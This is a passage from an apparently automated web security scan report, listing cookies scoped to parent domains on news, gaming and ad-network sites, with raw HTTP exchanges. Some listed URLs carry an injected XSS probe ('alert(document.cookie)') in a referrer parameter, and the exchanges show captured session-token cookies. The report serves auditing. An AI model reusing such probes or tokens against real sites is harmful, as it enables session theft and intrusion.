Connection: close
Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 02:25:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

9. Cookie scoped to parent domain previous next
There are 71 instances of this issue:

http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://www.43things.com/person/
http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
http://www.peanutlabs.com/peanutlabs/
http://www.peanutlabs.com/userGreeting.php
http://ad.doubleclick.net/click
http://ad.turn.com/server/pixel.htm
http://admeld.adnxs.com/usersync
http://ads.adxpose.com/ads/ads.js
http://altfarm.mediaplex.com/ad/js/55290
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://board-games.pogo.com/
http://board-games.pogo.com/games/monopoly
http://board-games.pogo.com/games/online-chess
http://board-games.pogo.com/games/risk
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://card-games.pogo.com/
http://card-games.pogo.com/games/cribbage
http://card-games.pogo.com/games/rainy-day-spider-solitaire
http://click.linksynergy.com/fs-bin/stat
http://clubpogo-games.pogo.com/
http://flash-games.pogo.com/
http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
http://puzzle-games.pogo.com/
http://puzzle-games.pogo.com/games/bejeweled2
http://puzzle-games.pogo.com/games/yahtzee-party
http://r.turn.com/server/pixel.htm
http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64
http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1
http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble
http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F
http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1
http://www.adobe.com/cfusion/exchange/
http://www.adobe.com/cfusion/marketplace/index.cfm
http://www.adobe.com/cfusion/membership/index.cfm
http://www.adobe.com/cfusion/membership/logout.cfm
http://www.adobe.com/cfusion/partnerportal/index.cfm
http://www.adobe.com/cfusion/showcase/index.cfm
http://www.adobe.com/cfusion/store/html/index.cfm
http://www.adobe.com/cfusion/support/index.cfm
http://www.adobe.com/events/main.jsp
http://www.bbc.co.uk/news/technology-12126880
http://www.e00.peanutlabs.com/js/iFrame/index.php
http://www.facebook.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/Pogo
http://www.facebook.com/campaign/impression.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/event.php
http://www.facebook.com/logout.php
http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
http://www.facebook.com/peanutlabs
http://www.facebook.com/sitetour/connect.php
https://www.facebook.com/login.php
http://www.gamespot.com/
http://www.peanutlabs.com/core.php
http://www.peanutlabs.com/pl/profileSurveyRegister.php
http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
http://www.pogo.com/action/pogo/lightreg.do
http://www.pogo.com/games/connect.jsp
http://www.pogo.com/games/scrabble
http://www.pogo.com/login/entry.jsp
http://www.pogo.com/login/pogo/setCookie.do
https://www.pogo.com/fbconnect/js.do

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
wsjregion=na%2cus; path=/; domain=.wsj.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.2. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.43things.com
Path:	/person/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.3. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.freshnews.com
Path:	/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSdcb5af41d343fdd786908e4442f98f39=dpp7pp1blldcdp337o15850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1
Host: www.freshnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.4. http://www.peanutlabs.com/peanutlabs/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/peanutlabs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /peanutlabs/ HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629

Response

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 01:35:19 GMT
Server: Apache
Set-Cookie: SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 01:35:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www1.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 0

9.5. http://www.peanutlabs.com/userGreeting.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/userGreeting.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=no34gl7ittr6r2j8nkt40st7q5; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=no34gl7ittr6r2j8nkt40st7q5; path=/; domain=.peanutlabs.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 31484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

       <!-- If
...[SNIP]...

9.6. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a8a/4/a7/%2a/i;227307433;1-0;0;50967133;3454-728/90;34263360/34281238/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O
Set-Cookie: id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 09 Jan 2011 02:03:13 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

9.7. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=10&sp=y&publisher_redirecturl=http://ad.afy11.net/ad?mode=7 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7Cundefined%7Cundefined%7C4; rds=undefined%7Cundefined%7Cundefined%7C14983; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:48:35 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3765491407790554839&fpid=10&nu=n&t
...[SNIP]...

9.8. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:01:48 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

9.9. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
